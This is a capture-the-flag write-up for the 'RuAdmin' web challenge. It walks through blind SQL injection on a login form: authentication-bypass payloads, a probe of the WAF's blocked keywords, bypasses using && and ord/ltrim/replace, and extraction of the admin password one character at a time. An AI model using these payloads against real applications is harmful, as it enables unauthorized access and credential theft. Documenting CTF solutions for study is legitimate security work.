Tags: web sqli
Rating:
# ▼▼▼RuAdmin(1000points、2/123=1.6%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
## ▼Stage1: Blind SQL injection
### 【Identify the vulnerability】
POST `/sessions`
↓
`username`=**'or'1'='0'#**&`password`=test ⇒Login failed
`username`=**'or'1'='1'#**&`password`=test ⇒Login success
↓
**Blind SQL injection !!**
and
There was a statement that you should login with `admin`'s authority
and
redirect `/admin`
↓
`/admin` has login function but **no vulnerability.**
---
### 【Attack scenario】
I will get admin's login information by Blind SQL injection at `/session` and login in at `/admin`.
---
### 【Identify the Database】
`username`=**'or''=''--**&`password`=test ⇒500エラー
`username`=**'or''=''--+**&`password`=test ⇒Login success
↓
**MySQL !!**
---
### 【Identify the WAF】
```
username=like&password=a ⇒hacking detected( `like`)
username=REGEXP&password=s ⇒hacking detected( `regexp`)
username=mid&password=s ⇒hacking detected( `mid`)
username=STRCMP&password=s ⇒hacking detected( `STRCMP`)
username=INSTR&password=s ⇒hacking detected( `INSTR`)
username=POSITION&password=s ⇒hacking detected( `POSITION`)
username=LOCATE&password=s ⇒hacking detected( `LOCATE`)
username=LPAD&password=s ⇒hacking detected( `LPAD`)
username=concat&password=s ⇒hacking detected( `concat`)
username=substr&password=s ⇒hacking detected( `substr`)
username=hex&password=s ⇒hacking detected( `hex`)
username=substr&password=s ⇒hacking detected( `substr`)
username=right&password=s ⇒hacking detected( `right`)
username=left&password=s ⇒hacking detected( `left`)
username=ascii&password=s ⇒hacking detected( `ascii`)
username=conv&password=s ⇒hacking detected( `conv`)
username=and&password=s ⇒hacking detected( `and`)
username=information_schema.tables&password=s ⇒hacking detected( `information_schema.tables`)
```
↓
WAF
---
```
username=or&password=s ⇒username or password is invalid (I can use `or`)
username=in&password=s ⇒username or password is invalid (I can use `in`)
username=if&password=s ⇒username or password is invalid (I can use `if`)
username=length&password=s ⇒username or password is invalid (I can use `length`)
username=ord&password=s ⇒username or password is invalid (I can use `ord`)
username=%26%26&password=s ⇒username or password is invalid (I can use `&&`: Substitution of `and`)
```
↓
OK
---
### 【Identify the number of data】
`username`='or id=0# ⇒ Login success!!
`username`='or id=1# ⇒ Login success!!
`username`='or id=2# ⇒ Login failed!!
`username`='or id>2# ⇒ Login failed!!
↓
2 data !!
---
### 【Identify column names】
`username`='or+length(username)>1# ⇒Login success( `username`!!)
`username`='or+length(password)>1# ⇒Login success( `password`!!)
---
### 【Identify admin's username】
`username`='or id=1%26%26username='admin'# ⇒Login success(id=1 is `admin`)
---
### 【Identify admin's password】
`username`='or+id=1%26%26length(password)=13# ⇒Login success admin password is 13 letters
`username`='or+id=1%26%26ord(password)=73# ⇒I
`username`='or+id=1%26%26ord(ltrim(replace(password,'I,'')))=95# ⇒_
・・・~(abridgement)~
`username`='or+id=1%26%26ord(ltrim(replace(password,'I_l0v3_Applz','')))=95# ⇒_
↓
admin's password is `I_l0v3_Applz_`
---
### 【Login at /admin】
`username`=admin&`password`=I_l0v3_Applz_ ⇒Login success
---
## ▼Stage2 :Rails Asset Pipeline Directory Traversal Vulnerability (CVE-2018-3760)
### 【function】
There is upload function and display upload folder path
---
I can not solve stage 2...
I'd like to look forward to someone's writeup